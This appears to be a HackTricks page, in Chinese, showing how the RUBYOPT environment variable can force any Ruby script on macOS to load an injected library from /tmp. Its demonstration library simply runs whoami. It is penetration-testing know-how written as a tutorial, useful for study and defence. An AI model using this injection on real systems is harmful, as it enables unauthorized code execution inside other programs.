macOS Ruby Applications Injection

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

RUBYOPT

使用此环境变量，可以在每次执行 ruby 时 添加新参数。虽然参数 -e 不能用于指定要执行的 ruby 代码，但可以使用参数 -I 和 -r 来将新文件夹添加到库加载路径，然后 指定要加载的库。

在 /tmp 中创建库 inject.rb：

inject.rb

puts `whoami`

在任何地方创建一个 ruby 脚本，如下所示：

hello.rb

puts 'Hello, World!'

然后让一个任意的 Ruby 脚本加载它：

RUBYOPT="-I/tmp -rinject" ruby hello.rb

有趣的事实，即使使用参数 --disable-rubyopt 也有效：

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

支持 HackTricks

Last updated 4 months ago